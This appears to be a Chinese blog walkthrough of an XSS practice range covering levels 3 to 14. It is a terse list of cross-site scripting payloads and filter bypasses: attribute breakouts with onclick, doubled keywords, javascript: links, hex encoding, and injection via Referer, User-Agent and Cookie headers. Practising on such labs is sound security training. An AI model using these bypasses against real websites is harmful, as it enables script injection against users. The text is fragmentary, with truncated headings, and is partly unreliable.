目录
靶场环境
测试使用
evel3
evel5
evel6
evel7
evel8
evel9
evel10
evel11
evel12
evel13
evel14
browser:firefox;plugin:Hackbar,tools:burp
注:常见payload在评论区
" ' <> scRiPt oNeEror oNcLicK a hReF
<> script onclick被过滤,用a标签绕过
asd">
keyword=">asd&submit=%E6%90%9C%E7%B4%A2


error click a ">
keyword="oonnclick ="javascript:alert(1)&submit=%E6%90%9C%E7%B4%A2

scr_ipt o_nerror o_nclick a hr_ef">友情链接
十六进制编码绕过
javascript:alert(1)
友情链接
" ' <> script oneeror onclick a href
javascript:alert('http://www.baidu.com')
友情链接
javascript:alert('http://www.baidu.com')
t_sort=11
t_sort=11"type="button" οnclick="alert(11)
抓包修改referer
GET /level11.php?keyword=12 HTTP/1.1
Referer: " type="text" οnclick="alert(11)
t_ua" value="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" type="hidden">
User-Agent: "type="text" οnclick="alert(11)
Cookie: user= " οnfοcus=alert(/xss/) type="text

上一篇:Tomcat 源码解析一请求处理的整体过程-黄泉天怒(上)
下一篇:mac装机必备